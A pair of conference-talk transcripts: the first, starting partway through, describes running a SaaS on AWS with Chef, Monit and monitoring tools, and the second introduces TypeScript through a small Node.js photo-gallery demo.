"We need someone to take this thing under his wing as his baby," blah, blah, blah. So the part I wanted to use, which generates documents, is now an orphan child waiting to be adopted. That was a no-go. What we're looking into now is a framework called Aspose, which, based on our trials, is really good at abstracting all these different formats. You can specify something with this library, and it will come out exactly the same in PDF, Word, whatever. I think they have a .NET version as well, but we are using the Java one, and just because we can, we are wrapping it with Clojure. This is early-stage prototyping, so I can tell you more about how that worked out later. What I learned before I started this, and after I've done it, is that monitoring is very, very important. You need to make sure your servers are up and running all the time, and you need to monitor them a lot. On a very low level, if you know the Unix world at all, we use something called Monit, which checks disk space, memory usage, et cetera. It knows how to restart services when something goes wrong, and it also notifies you by email. We've been using that a lot, and it is very easy to set up with Chef. Let me see if I can find an example; I think it's the workers one. With Chef, it's as simple as saying: for this worker, I want to create a Monit file, and it looks something like this. Check the process with this process ID, start it like this, stop it like this, and you can have lots of these different checks, which check all kinds of things for you. That makes sure it's up and running. Chef also runs as a daemon; on our servers it runs about every five minutes, and it just makes sure that everything is up to date and everything is installed as you told it to.
So I once wanted to do a manual change on the server, and I tried to stop NGINX, and it just kept coming up again. And that's because of Monit. So I stopped Monit, and it still came up again. That's because Chef restarted Monit, and Monit restarted NGINX. So it's almost impossible to stop anything on the servers now, but I guess that's a good thing. New Relic is an online tool that is very useful for figuring out where in your code things are slow. So it tells you things like which controller is being used most, which is the slowest one, is it the database query that is slow, or is it this model or this service, whatever, that is slowing you down. And that actually works both client side and server side. They also ping your servers from around the world and tell you if something goes down. Same thing with Pingdom; they just ping it. We have a status page that just says, am I connected to the database, am I connected to this, blah, blah, blah, and if not, it returns something other than 200, and Pingdom will notify me. I learned the lesson the hard way, doing this more or less on my own: when something goes wrong, it sends out an email. But you know how you connect your mobile to Wi-Fi, and sometimes you're connected to Wi-Fi but you're not connected to the internet? So I was at home one day and I just walked out the door in the morning, and it's like, whoa, I've got tons of emails saying everything was down, and it's like, why didn't it tell me this before? Because I wasn't connected to the internet. So now I have SMS notifications in addition to that. Just a lesson learned. I also use something called Airbrake, which basically hooks into every uncaught exception, both client side and server side. It sends it to the service, and you get an email saying, okay, this thing went wrong on this URL, this is the stack trace, these are all the request parameters, et cetera, et cetera.
So it's very useful. Instead of having to monitor your log files and look for errors, it just tells you immediately where the problem is, and then you can fix it fast. A few other tools we've used: Intercom, which is basically a chat. Any user can just say, help me, and you get notified in an app or by email. If you answer fast enough, they'll get the response back in the app; if not, we send them an email, and that happens automatically. That's increased the amount of feedback from our users a lot. You feel like you're quite close to the user, which is good. We've also been using something called Mixpanel for analytics, but it hasn't been giving us that much value so far. So what has gone wrong? We have all these pictures, and they are stored on Amazon. But we can't just store them openly, because they're kind of private to the customers. But it's still nice to leverage Amazon's infrastructure in terms of hosting. So the way it works is that when I ask my model for the URL to an image, it gives me a URL with a key that lasts for, say, an hour. If you have this parameter, you can download that image, and you can cache it for an hour. However, every time I did a new search, it would just generate a new URL, so the browser couldn't cache it. So I wanted to cache this, and I started caching these URLs in something called Redis, a key-value store, very high performance. And that worked fine until one day someone said the app is really slow: searching takes forever, but it works. I wasn't getting any real errors; it was just very slow. And I thought I had set the timeout to one second, which I thought was quite low: okay, if it times out after a second, it should still work. But for some reason it was taking longer. And that's obviously because the timeout was one second per image. So it was queuing all this up.
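The queuing effect described here can be sketched in a few lines. This is a hypothetical illustration, not code from the talk: the names `fetchWithTimeout` and `loadImages` are invented, and the "fetch" here is just a timer that always hits its timeout before falling back, so the per-item delays add up when items are loaded one after another.

```typescript
// A lookup that always hits its per-item timeout before falling back
// (simulating a cache lookup that never answers in time):
function fetchWithTimeout(timeoutMs: number, done: (url: string) => void): void {
  setTimeout(() => done("fallback-url"), timeoutMs);
}

// Fetching the image URLs one after another makes the timeouts accumulate:
function loadImages(count: number, timeoutMs: number,
                    done: (elapsedMs: number) => void): void {
  const start = Date.now();
  let remaining = count;
  const next = () => {
    if (remaining === 0) {
      done(Date.now() - start);
      return;
    }
    remaining--;
    fetchWithTimeout(timeoutMs, next);
  };
  next();
}

// With a 1000 ms timeout per image, 100 images total ~100 seconds in the
// worst case; with a ~10 ms timeout, the same loop totals about a second.
loadImages(5, 10, (elapsed) => console.log(elapsed + " ms"));
```

This is the accumulation the speaker hit: the timeout applied per image, not per search, which is why cutting the per-item timeout to almost zero fixed the overall latency.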
So I ended up setting the timeout to something like 0.01 seconds, so it times out almost immediately if we can't fetch it. Even if that's 100 images, it still probably just totals to a second, and it still works. We have our source code on GitHub, which I think is really nice, but people have been trying to hack them quite a lot lately; there have been some distributed denial-of-service attacks on them. And that actually means that GitHub might be unavailable for an hour, which is okay, but if you're about to deploy, or are just in the middle of a deployment, and you're trying to fetch the new code from GitHub and put it on your server, then that is a problem. I'm not quite sure how to solve that. You could always mirror it somewhere else; maybe that's the solution, but I'm not sure. So I mentioned these servers on Amazon. It hasn't happened in a while, but it did happen that they became unavailable. You might get an email saying, we're going to retire this server, you need to get off it within a week. And then it might just happen the day after. That happened to us once as well, because there is always a reason they are retiring them. I think they find out something is wrong with them and they try to keep them running. But what I learned is that as soon as you get an email saying, we'll retire this in a month, just do it immediately, because there is probably a reason they are retiring it. We also do a single sign-on integration. So we support Google Apps and Active Directory Federation Services integration. You log in, you're redirected to one of our customers' ADFS servers that is exposed to the Internet, they log in there, and it sends a signed request back to us with a valid email address, et cetera, which we then validate. And that worked; it wasn't too hard to set up. And it had been working fine until one day I had replaced the server with a new one, but it was exactly the same, because with Chef I used exactly the same stack.
It was not a new version of the code. So it's like, what went wrong? Why isn't this working? It worked yesterday, and it's the exact same thing. It turned out the clock on the new server was a bit off compared to our customer's server. So you need to take that into account. There are tools that allow you to synchronize clocks with an official time source; that helped. And you can also increase the allowed clock drift a bit. But that was a tricky one. So going forward, we're trying to make the app more interactive. Say two people work on the same document: we want them to be able to do that seamlessly, without overwriting each other's changes or just getting a conflict saying, no, you can't send this. So we've been trying a service called Pusher, which is essentially WebSockets. If someone makes a change, it goes to the server, the server tells Pusher, Pusher sends it through WebSockets to the other user's client, and he can fetch the latest data. But that is tricky to get correct, because when you open and close your laptop, you reconnect, you move around; everything can happen, and it's hard to know the state on the client side. So that's our experience with that so far. We've been using it a little bit, but not extensively yet. So I guess that was going through our stack, how it has evolved, what has worked and what hasn't worked that much. Any questions or comments? Cool. [Audience comment, apparently suggesting a library such as ShareJS.] Thanks. That's interesting. What does it do? It does an operational transform on edits. Nice. It handles all the complexity of syncing data between different clients. So it's basically Google Docs for JSON. Nice. We're looking for that, actually. Any other comments, questions? Anything you want me to dive deeper into? I'd really appreciate it if you use the comments box downstairs, just the red, yellow, green ones. And if you have any suggestions or feedback, please come to me and tell me. I appreciate honest feedback.
So, yes. [Audience question about whether a non-cloud solution would do, given the amount of traffic, and whether the app really needs to be scalable.] That's a good question, whether we needed it to be scalable and whether we could run a non-cloud solution. Obviously we have big ambitions; we want to have lots and lots of customers on this. So we're building it to scale, but maybe we're doing it prematurely. That could be. The other thing is the flexibility, which I like. So if I want to play with, let's say, Postgres instead of MongoDB, or I want to try a new library somewhere, it's just a quick command and I have a new server. I can play with it and I can nuke it again if I don't want it. I kind of like that. And I can scale them up and down. Most of these servers are small instances or micro instances for now, so they don't cost that much. But it's just the click of a button and you have a new server, and I haven't found the equivalent of that with an in-house server. But I see your point. Obviously, maybe we could run all of this in one box and it would still have worked, and maybe it's a bit over-engineered for now. I can agree with that. But we are trying to build something that can scale, and it will have to scale very soon. It's obviously hard to know up front which part you need to scale. [Audience follow-up.] No. But, you know, doing a startup, if you start counting hours, I think you go crazy anyway. But no, I agree, it could be worth doing that calculation to figure out if it's actually worth it. It does give me the confidence that I can scale almost overnight if we need to, which is nice. And we can say that to customers. Yes? [Audience question about sales and marketing.] So, obviously, coming from a developer background, sales and marketing is not my strength, really. At marketing, I think we're still pretty bad.
But the sales part, we're getting better at. We do everything from just meeting people here, because our clients are consultancies. So I can do talks here and I kind of reach my target market that way, and just be part of the community, which I enjoyed anyway. So for me it's a win-win: I can meet people, I enjoy talking about technical stuff and process stuff, et cetera, with them, and they are potential clients as well, which is good. But yeah, for us it's just word of mouth, just being out there; that works. And then that gives you a lead somewhere, and then it's your responsibility to take it from there. But business to business, being few people, being something new, that's what I tried to talk about earlier: the security requirements, the privacy requirements, the backup solutions, all that. You have to make sure you reduce the risk for your clients. So we dump all the CVs as Word documents to your preferred storage solution every night, just so you have them. So you can trust that if we disappear or go down, which we won't, you're still safe and you have all your data. But in terms of sales, yeah, it's just talking to people, reaching out, being visible, and sometimes cold calls. But they're quite long sales cycles, at least for the large clients. There's lots of legal stuff, and just getting things to happen takes a while. I don't know if I answered anything, but yes. [Inaudible audience question about the Chef and Monit setup.] Yes, that sounds like a good solution, I think. Mine was just a simple example; we have some more complicated ones. And Chef is running, but it's mostly just installing things. On the third or fourth run, it doesn't really do anything. But obviously, if something has changed, it will probably check that most of the services are running. But that's not really its job; it just happens to do that.
But I agree, separating responsibilities there would be nice. And as I said, it could be how I use it, but I feel Chef is not perfect. All these DevOps things are quite immature or new, and I think people are trying to find the right balance or separation there. That's why I'm a bit curious about Docker, for example. Cool. I'd love to talk more about that. Anything else? Yes? [Audience suggestion about Gitorious.] But is that not just another... sorry, so Gitorious instead of GitHub? Ah, okay. So I love all the features of GitHub, but it would probably be nice to keep a clone somewhere, and maybe Gitorious would be a good option. Yes. Cool. Thanks. Thank you.
We would like to share our experience with building and running a SaaS in the cloud. We will talk you through how our solution grew from running a single application on Heroku to consisting of 12 servers running in a secure cloud. Which technologies and frameworks have we used, and what have our experiences and challenges been? Which trade-offs did we have to make to account for security and privacy? We will also share some war stories from when things have gone wrong in the past.
10.5446/50543 (DOI)
This is what I'm going to talk about. Once you go the TypeScript path, you don't have to understand those things. Hopefully you will understand those things, but you will use a language that compiles into JavaScript and gives you type safety. And it gives you a lot of other good stuff, and I'm going to present the TypeScript language in the next hour. If you don't know me, I'm Gil Fink. I'm a senior consultant working for my own consulting company, called sparXys. I've been an ASP.NET MVP for the last five years. I also wrote a book called Pro Single Page Application Development; you can buy it on Amazon. And I wrote four different MOCs; a MOC is a Microsoft Official Course. I wrote the courses about HTML5 programming and about Windows 8 development using HTML5 and JavaScript. Not so good for me, because Microsoft doesn't give me the credit that I wrote those courses and the books that follow the courses, but, you know, you can't have everything in life. What I'm going to do is, as I said, introduce the TypeScript language. And then, after I introduce a few features of TypeScript, we're going to write an end-to-end application. So if you've heard about Node.js, I'm going to use Node.js on the server side, and I'm going to use JavaScript on the client side, to build my web application. But before building that application, let's talk about writing end-to-end JavaScript. Oh, my God. Who has had the opportunity to do such a thing, except for me? Okay. Not a lot of hands in the crowd, but people, you can do that today with frameworks like Node.js. You can write server-side code in JavaScript and you can write client-side code in JavaScript, and you will have full stack development in JavaScript. And there are two quotes here that touch on one of the problems. The first quote is from Erik Meijer. Erik said something like: JavaScript is the assembly language of the web. Who wants to write in assembly?
If you've learned assembly, then you understand that it's hard. The second quote here is: you can write large programs in JavaScript, you just can't maintain them. This is a harsh thing to say, and it comes from Anders Hejlsberg, but it's true. Trying to manage a million lines of code in JavaScript is horror. It's so hard to do. If you are not hardcore JavaScript developers, and you have a lot of junior developers in your company working in JavaScript, you'll find that JavaScript is one of the languages that is learned in ignorance. People just use it as is and don't try to understand the pitfalls, like those I showed you at the beginning of the session. So what are the alternatives? The first alternative is my favorite: write hardcore JavaScript. I have Stockholm syndrome; I must confess I love JavaScript. But there is another option. The other option is writing JavaScript with preprocessors. There are languages that compile into JavaScript. One such language is CoffeeScript, written by Jeremy Ashkenas. It influenced a lot of features in ECMAScript 6, which is the next version of JavaScript. And CoffeeScript forces you to learn a new language in order to create your JavaScript, in order to compile to JavaScript. Other languages, like Dart or ClojureScript or Script#, are the same: you have to learn a language, and that language will compile into JavaScript. What if we had a language that compiles into JavaScript, but you write it in JavaScript? And this is where TypeScript comes in. TypeScript is just a superset of JavaScript. What I mean is, if you know JavaScript, you are 80% of the way there. Every JavaScript file that you rename into a .ts file, the file extension of TypeScript, will automatically be a TypeScript file. You don't have to do anything. Well, almost nothing, because if you have problems in your code, you will get notified by the TypeScript compiler that you have problems in your code.
Problems with typing, problems with using things which are obsolete, et cetera. So with that, let's jump into a first demo. Before we jump into the demo, I want to show you something. If you want to start with TypeScript, the first place you should go is typescriptlang.org. This website includes, first, the ways to download TypeScript. If you are using Visual Studio 2013 or 2012, it's part of Visual Studio. If you are using WebStorm like I do (WebStorm is an IDE from JetBrains), then it's part of the IDE from version 6. And there are plugins for Sublime and other IDEs that you can use. But if you want to download it right now, you go to the website, and you just need to click on Get TypeScript Now. Once you do that, you can download it and use it. The other option is using npm: if you are from the Node environment, use npm and install TypeScript. Once you've installed TypeScript, let's go to WebStorm and start working with it. So let's write the thing that I wrote earlier in my demo. Let's use 9 instead of 8, and let's put the string "9", and let's do something like console.log of num1 minus num2. Okay, I'm saving the file. And you can see here that I have an error showing up inside of the IDE itself. That error is telling me that the right-hand side of an arithmetic operation must be of type any, number, or an enum type. That means that I have a problem here. I can do other stuff, like, for example, this: I'm using a colon to say this is a number, and I get the error printed to me that num2 must be a number and I'm using a string instead. So this is how you annotate types in TypeScript: you just put a colon and then, voila, we have types. I didn't mention it, but you can see here in my solution that I'm using an app.ts file instead of an app.js file, and in the output here you can see app.js, and it is compiling.
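The demo just described boils down to a few lines. A minimal sketch, with the variable names taken from the talk and the error cases kept in comments so the file still compiles:

```typescript
// Without annotations, TypeScript still infers types from the literals:
var num1 = 9;        // inferred as number
var num2 = "9";      // inferred as string

// console.log(num1 - num2);
// => compile error: the right-hand side of an arithmetic operation
//    must be of type 'any', 'number', or an enum type

// With an explicit annotation, the mistake is caught at the declaration:
// var bad: number = "9";   // error: string is not assignable to number

// With consistent types, the subtraction behaves as expected:
var num3: number = 9;
console.log(num1 - num3); // 0
```

Note that the compiler reports the error but still emits JavaScript, which is exactly the behavior the talk goes on to describe.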
The TypeScript compiler will compile even though it warns you that you are doing something wrong, because JavaScript is a dynamic language; you might actually want to do such things, but you get the warning from the TypeScript compiler. So once you know a little bit about TypeScript, let's go on. What are TypeScript's key features? TypeScript includes all the things you know about JavaScript, and it is a superset of JavaScript because it adds a lot of things to JavaScript. For example, ways to do encapsulation: interfaces, classes and modules. You can write modules using the module keyword, you can write classes using the class keyword, you have lambda expressions in TypeScript, and even generics. You know, the team that wrote TypeScript at Microsoft is led by Anders Hejlsberg. Anders loves C#, he is the father of C#, and of course TypeScript will include something like generics. The IDE also gives you IntelliSense and syntax checking with TypeScript. You saw that earlier. So you have type safety here, and you don't have to fall into the pitfalls that we saw earlier at the beginning of the session. How does the magic work? You write something in TypeScript, and then, under the hood, the IDE uses tsc.exe, the TypeScript compiler, in order to compile your TypeScript code into JavaScript. More than that, you don't have to use an IDE; you can use it on the command line. Just make sure you have tsc.exe installed in your environment. Once you have that, you can do it in any operating system, in any environment, in any host, whatever. TypeScript includes features like type annotations. You can do something like var str, colon, string, to emphasize that this is a string. You have five primitive types in JavaScript, which are number, string, boolean, null and undefined. TypeScript also gives you a sixth type, which is called any. Any is a type that refers to anything. If you want to go the dynamic way, then use any as your type.
More than that, you can see in the slide here that we have the opportunity to mark that a function returns something. It returns a string here, and I annotated the function with string. TypeScript gives you the opportunity to use classes and interfaces: interfaces in order to type-check that you implement something in your code, and classes to organize your code. You can write the class keyword, which comes from ECMAScript 6, today using TypeScript. Later on, when ECMAScript 6 is finalized and is part of JavaScript, your implementation will already be aligned to ECMAScript 6, which is something very important about TypeScript. A lot of the features here in TypeScript come from ECMAScript 6. Once you go the TypeScript way, you write most of your code in ECMAScript 6. There are a few features that aren't aligned to ECMAScript 6, like generics and enums, but the majority of the things that TypeScript adds to the JavaScript language are from the standard. Besides classes, you can use modules. A module is a container that wraps functionality, classes and interfaces into one module. You can use the import keyword to import modules into your code, and export to export something from the module. Once you have modules in your code, you don't have to write what you see on the right-hand side, which is what is generated by TypeScript. If you are writing plain JavaScript, you must write the code on the right-hand side yourself in order to wrap something into a module or namespace. Now that we know a little bit about TypeScript, let's jump into a demo and see TypeScript in action. I'm going to close this and do something like that. The first thing I'm going to do is write my own module. If I press Ctrl+S, nothing happens in the compiler output. Why? The module doesn't include any code, so the compiler is smart and understands that it doesn't need to emit anything. Once I have my module, let's continue and add an interface. The interface here, which is called IGreeter, tells me that I need to implement a greet function in my code. That interface is exported from the module, but again, nothing goes out to the output. This is because interfaces are a key feature in TypeScript, but they don't have any meaning in JavaScript, so the compiler won't emit anything for them.
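As an aside, the module wrapping just described can be sketched like this. One assumption worth flagging: the talk uses TypeScript's older `module` keyword for internal modules, which was later renamed `namespace`; the sketch uses the newer spelling, and the generated JavaScript is the immediately-invoked function pattern from the slide:

```typescript
namespace app {
  // Not exported, so invisible outside the namespace:
  const factor = 2;

  // Exported members become properties on the generated app object:
  export function double(x: number): number {
    return x * factor;
  }
}

// Roughly what the compiler emits, i.e. the hand-written pattern the
// slide shows you no longer have to write yourself:
// var app;
// (function (app) {
//     var factor = 2;
//     function double(x) { return x * factor; }
//     app.double = double;
// })(app || (app = {}));

console.log(app.double(21)); // 42
```

The point of the feature is exactly this: the namespace boilerplate is generated for you, and only `export`-ed members leak out.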
Once I have my model, let's continue and add an interface. An interface here, which is called iGridder, tell me that I need to implement a grid function inside of my code. That interface is exported from the model, but again, nothing going out to the output. This is because interface are key feature in TypeScript, but they don't have any meaning in JavaScript. So I want compile it. So we have our interface. Let's add a class. Sorry. And here, let's close this. I'm saving the class and let's take a look at the class. I'm exporting that class from the model. I'm implementing iGridder, meaning that I need to write a code for the grid function, which is void. It returns nothing. What it's going to do is just output to the log, the grid that I got inside of TypeScript, and output to an element the same grid. You can see here that I have a private keyword, which is transferring the grid variable into a private member. That means that if I'm using TypeScript, I won't see that member outside of the class. And I have a constructor here. That constructor keyword is aligned to ECMAScript 6. This is how you write a constructor in ECMAScript 6. In the constructor, I'm just getting a string and I'm putting it inside of this grid. Once I finish that, let's go on and finalize the example here. I'm using the Windows AddEventListener and I'm wiring the DOM content loaded, the event that was added in HTML5, in order to catch the moment that the DOM itself was loaded. You can see a feature of TypeScript, which is a lambda expression. The callback here is a lambda. And here is another lambda that I'm wiring to the click event of a button in my web page. And a few things to notice here is this thing, which is casting in TypeScript, you do cast using this notation. So I'm casting the returned value from getElement by the txt name into HTML input element. And I'm getting out the value from a text box. 
Later on, I'm creating my own greeter using the module that I wrote earlier, app.Greeter, just passing the name that I got from the text box, and printing something using greeter.greet. Let's see it in action. So, running this code: I'm typing NDC, clicking Greet, and hello, NDC. If I open the DevTools: hello, NDC in the console, and we are here. So this is a very, very simple example of using TypeScript, using classes, modules and interfaces. You saw casting, you saw types inferred for strings or numbers, et cetera, and you saw lambda expressions. But we are here because we are building major applications, end-to-end applications. So let's build a simple end-to-end application using TypeScript. The first thing that I've done here is just created a new project in WebStorm from the Node.js Express app template. If you're not familiar with Node.js, Node.js is a server-side implementation using JavaScript as its main language. Node.js comes with a lot of good things. One of those things is the Express framework, which gives you the opportunity to write MVC applications using Node.js. So we are going to use Node.js with Express in order to create a simple web application. The first thing that I've done is change the app.js here into an app.ts file, and I'm going to use that .ts file in order to create my Node implementation. So let's do that. Most of the code here is just part of the template for Node.js Express; I will highlight only the things that I added. The first thing that I added here was a function called walk. That function is going to get a folder name and a callback, and it will return all the file names from the folder, with a relative path, so that the client can get those file names and use them later on. So what I'm doing here is using fs, the file system module in Node.js, to read the folder that I got, and you can see that the callback here is using a lambda.
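Before moving on to the server side: the greeter demo just described can be reconstructed as a console-only sketch. This is a reconstruction from the talk's description, not the exact demo code: the DOM wiring, the cast, and the button handler are omitted so it stays self-contained, and greet returns the message here (the demo's greet returns void) so the result is easy to check.

```typescript
namespace app {
  export interface IGreeter {
    greet(): string;
  }

  export class Greeter implements IGreeter {
    // private members are not visible outside the class in TypeScript
    private greeting: string;

    // ECMAScript 6 style constructor, as in the demo
    constructor(greeting: string) {
      this.greeting = greeting;
    }

    greet(): string {
      const message = "Hello, " + this.greeting;
      console.log(message); // the demo also writes this into a DOM element
      return message;
    }
  }
}

const greeter: app.IGreeter = new app.Greeter("NDC");
greeter.greet(); // logs "Hello, NDC"
```

The interface compiles to nothing, the namespace compiles to an immediately-invoked function, and the class compiles to a constructor function, which is what the emitted app.js in the demo shows.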
If I'm getting an error, then I'm returning an empty array from the callback. If I don't have an error, then I'm using files.forEach in order to iterate over all the files in the folder, and I'm just writing the file names to the result array. And I'm calling the callback at the end. That is a simple function that gives me the opportunity to collect and output all the file names in one place in my implementation. All the other things here are part of the Node.js Express template, and I only added this part in order to do some stuff. So I'm creating an endpoint called getallimages, and that endpoint is going to work on a public folder here, public/content/photos. This is something that you can see here: I have three images, and it is going to write to the output a JSON version of the array that I got earlier from the walk function. So I'm stringifying that array and sending it to the client side, and that's all. That's all the implementation I'm using. Later on, I'm just starting my server using plain Node.js code. So let's run the application right now. I'm listening on port 3000, and let's go to port 3000, and... nothing. What the application did was return the HTML file that I have, which looks something like that; it has nothing inside of it. If I go to getallimages, then you can see the JSON returned from the server with the images. And as you might expect, I'm going to build a photo gallery, and I want to implement the client side using a library, which is something that I'm going to do right now. So we have an implementation for the server side; let's go on and implement our client side. And as I said, we are going to implement the client side using TypeScript. So the first thing that I'm going to do is create data structures. Those data structures, or, if you know me, I'm a fan of domain-driven design, will be the domain of our application.
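The walk function and the endpoint just described can be sketched as follows. This is a sketch based on the talk's description, not the exact code: the parameter names are assumptions, the error case returns an empty array as the speaker says, and the Express endpoint is left as a comment since it needs a running server.

```typescript
import * as fs from "fs";

// Collect the file names in a folder and hand them to the callback,
// prefixed with a relative path, e.g. "content/photos/1.jpg".
function walk(folder: string, relativePrefix: string,
              callback: (files: string[]) => void): void {
  fs.readdir(folder, (err, files) => {
    if (err) {
      // On error, report an empty result, as in the talk.
      callback([]);
      return;
    }
    const result: string[] = [];
    files.forEach((file) => {
      result.push(relativePrefix + "/" + file);
    });
    callback(result);
  });
}

// The Express endpoint from the talk would then be roughly:
// app.get("/getallimages", (req, res) => {
//   walk("public/content/photos", "content/photos", (files) => {
//     res.send(JSON.stringify(files));
//   });
// });

walk(".", "content/photos", (files) => {
  console.log(files.length + " files found");
});
```

The lambda passed to fs.readdir is the arrow-function callback the speaker points out in the demo.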
The data structures are going to be implemented in a very strongly typed way, typed against the library that I'm going to use. That library is called Galleria. I downloaded the library earlier; here it is. It will enable me to show the photo gallery beautifully. So I need to be aligned to the Galleria objects, and I've just created my own objects to represent the data that Galleria needs to use. So let's take a look at the code here. I've created a module called app.data.structures. That module is going to wrap all the data structures in my code. I'm exporting from that module a GalleriaImageConfigOptions class, an options class that I'm going to use in order to configure each Galleria image that I'm going to show on the client side. You can see here that I'm using the constructor keyword, and I'm using syntactic sugar to implement properties. One of the ways to implement properties, if they don't need to do anything, is just receiving them in the constructor using public, the name of the property that you want to expose, and the type of the property. So we have a lot of properties that I'm creating here, and that's the only thing you need to understand about this class. The second class here is GalleriaImage. This is an implementation for an object that will expose data in the representation Galleria expects. So it gets a GalleriaImageConfigOptions in the constructor and puts it in the options variable, which is a private member of GalleriaImage. And later on, you can see here that I have a lot of properties that I'm exposing. The get and set accessors are part of TypeScript. They will be part of ECMAScript 6, but currently they are not. So in order to create a property, I can do something like get image, where I'm returning the image that I'm storing in the GalleriaImageConfigOptions, or set image, where I have logic that says: if I don't have an image, throw an exception.
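The two patterns just described, parameter properties as syntactic sugar in the constructor, and get/set accessors, can be sketched like this. This is a simplified sketch: the real classes are typed against Galleria's options and have six properties, while here only two invented fields (image, title) are shown.

```typescript
// Parameter properties: "public image" in the constructor both declares
// the field and assigns it; no explicit "this.image = image" is needed.
class GalleriaImageConfigOptions {
  constructor(public image: string, public title: string) {}
}

class GalleriaImage {
  // "private options" is the same sugar, hiding the options object.
  constructor(private options: GalleriaImageConfigOptions) {}

  get image(): string {
    return this.options.image;
  }

  set image(value: string) {
    // The setter can hold validation logic, as in the talk.
    if (!value) {
      throw new Error("image must not be empty");
    }
    this.options.image = value;
  }
}

const img = new GalleriaImage(
  new GalleriaImageConfigOptions("content/photos/1.jpg", "First"));
console.log(img.image); // "content/photos/1.jpg"
```

In the emitted JavaScript, each accessor pair becomes an Object.defineProperty call, which is the compiled output the talk walks through next.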
Later on, you can see I can drill down, and I have six properties implemented here. If you want to see the output of the code, let's open the JS file. Let's compile it. It didn't compile... okay, now we've got it. And you can see here, first, the module that is compiled into immediately-invoked function expressions, and later on, we can see that I have a constructor function returned as GalleriaImageConfigOptions, and we can see how the GalleriaImage was compiled: in order to create a property, it is using Object.defineProperty, which is something that you can use from ECMAScript 5. So the compiler uses good practices in JavaScript. Douglas Crockford said something very interesting about TypeScript. He said that, of all the JavaScript preprocessors, TypeScript generates the most beautiful JavaScript code that he had seen. And then, after he said that, he said in another place that he didn't say that, but it's online. So we have our data structures, but we can't do anything with data structures alone, right? Well, we can, but we need other things implemented before we go on. So the second thing that I'm going to implement is a data service. We have a server side, and we want to get to the server side. I'll implement a class called DataService in order to send requests to the server. So let's implement it. In this module, you can see a few things. The first thing is that I'm importing, using the import keyword, the module that I wrote earlier, app.data.structures. Later on, I'm exporting from this module, from app.data, an interface called IDataService that forces me to implement a function called getImages, which returns a jQuery promise. If you use jQuery, then you know that I can use promises with jQuery, and promises are something that I prefer to use once I'm going to the server side, because going to the server is an asynchronous operation, and promises help me to write asynchronous code as if it were synchronous, waiting for something to happen. That is the promise: it promises that something will happen or that something will fail. Saying that, where do I get that jQuery promise type from?
That is the promise: a promise that something will happen or something will fail. That said, where do I get that jQuery promise from? One of the things you need to understand in TypeScript is that we have declaration files. What is a declaration file? (Sorry, the table here is not fond of my mouse and slows me down.) This is the declaration file for jQuery. A declaration file is just a file that describes a library's types in TypeScript, and later on I can import that declaration file — you can see it here at the beginning — and use the typing of the library. Not all the libraries out there have a typed declaration file, but one place you should go to if you are working with TypeScript is DefinitelyTyped. Someone called Boris Yankov uploaded to GitHub many, many declaration files for many, many libraries out there. For example, if you want to use AngularJS with TypeScript, go here, download the declaration file for AngularJS, add the reference, and bang — you are working with AngularJS in TypeScript. More than that, if you are a fan of Backbone like I am, you can find the Backbone declaration file here, et cetera, et cetera. At the end of the session, I will give you a references slide, and DefinitelyTyped is part of it. So we have a declaration file, and we use jQuery promises. Let's go on. I am implementing the data service class here, and I am implementing getImages. What getImages does is first create a deferred object — the object that wraps the promise I am going to return. Then I call the getJSON function to go to the server, to the get-all-images endpoint. I get the array of images, I iterate over it, and I push into the return array here, which is typed as GalleriaImage, new objects with the relative path of each image that we saw earlier.
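Before moving on, here is a miniature of the declaration-file idea just described. Instead of a real jquery.d.ts, the interfaces below play the same role — describing an API's shape so the compiler can check calls against it. PromiseLite, JQueryLite, and $lite are illustrative names, not the real jQuery typings.

```typescript
// Plays the role of a declaration file: it only describes shapes.
interface PromiseLite<T> {
  then(onDone: (value: T) => void): void;
}

// The "declared" API surface. In a real project this would live in a
// .d.ts file, and the implementation would come from the library itself.
interface JQueryLite {
  getJSON(url: string): PromiseLite<string[]>;
}

// A stub implementation so the snippet runs without jQuery; it resolves
// synchronously with a fixed image list.
const $lite: JQueryLite = {
  getJSON(url: string) {
    return {
      then: (onDone: (v: string[]) => void) => onDone(["one.jpg", "two.jpg"]),
    };
  },
};

$lite.getJSON("/getallimages").then(images => console.log(images.length)); // 2
```

The point is that once the compiler knows the shape, any call that does not match it — a misspelled method, a wrong argument type — fails at compile time rather than at runtime.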
Once that's done, I resolve the promise and return it from the function. So we have an implementation that wraps the data service and gets all the images back from the server side. Let's go on and bootstrap our application. In the bootstrap here, I am going to use Galleria itself. Galleria exposes a global object called Galleria, which represents the photo gallery. On the other hand, Galleria doesn't have a declaration file. So what can we do? This is not a typed library. The first thing you can see here in the code is declare var Galleria. Once I declare something like that, the object is typed as any — it gets the any type in TypeScript, and we treat it as a dynamic object. So I can use it everywhere without the compiler knowing anything about the object itself. But once you go down that path, you need to understand the object that you use, because it's dynamic — we are back in JavaScript territory. Later on, I'm creating a module that imports app.data and exports an interface called IBootstrap, which includes only the run function, and here is the implementation of the Bootstrap class: just this.getData. Here is the getData function. It returns a promise, and it goes to the data service and calls its getImages function. That's all. Once the promise finishes, I can wire up a then function which is going to do something — and what it's going to do is configure Galleria. This is something I won't get IntelliSense for, the Galleria.configure call, because it's any, a dynamic type. So I need to know how Galleria works — and I do — so I set the data source to the images I got from the server side, and I run Galleria on some element in my DOM. Okay. So I've built all of this and I want to run it, so let's add the code that starts everything up: I'm wiring an event listener to DOMContentLoaded, and in the event listener I just bootstrap my application. That's all.
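Pulling the pieces together, here is a compressed, self-contained sketch of the flow described above — data service, untyped Galleria, and bootstrap. jQuery's deferred is replaced by a native Promise so the snippet stands alone, and Galleria is stubbed locally (in the real app you would write `declare var Galleria: any;` with the library loaded via a script tag). Any name beyond those mentioned in the talk is illustrative.

```typescript
// Data service: fetch image names and build relative paths.
interface IDataService {
  getImages(): Promise<string[]>;
}

class DataService implements IDataService {
  getImages(): Promise<string[]> {
    // Stand-in for $.getJSON("/getallimages") plus the deferred.resolve call.
    return Promise.resolve(["one.jpg", "two.jpg"]).then(names =>
      names.map(n => "/photos/" + n)
    );
  }
}

// Untyped library: stubbed here so the snippet runs on its own.
const Galleria: any = {
  dataSource: null,
  configure(options: any) { this.dataSource = options.dataSource; },
  run(selector: string) { return "running on " + selector; },
};

// Bootstrap: get the data, then configure and run the gallery —
// mirroring the IBootstrap/run wiring described in the talk.
class Bootstrap {
  constructor(private dataService: IDataService) {}

  run(): Promise<string> {
    return this.dataService.getImages().then(images => {
      // No IntelliSense from here on: Galleria is `any`.
      Galleria.configure({ dataSource: images });
      return Galleria.run("#galleria");
    });
  }
}

new Bootstrap(new DataService()).run().then(result => console.log(result));
```

The real app would kick this off from a DOMContentLoaded listener; here the last line calls run directly.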
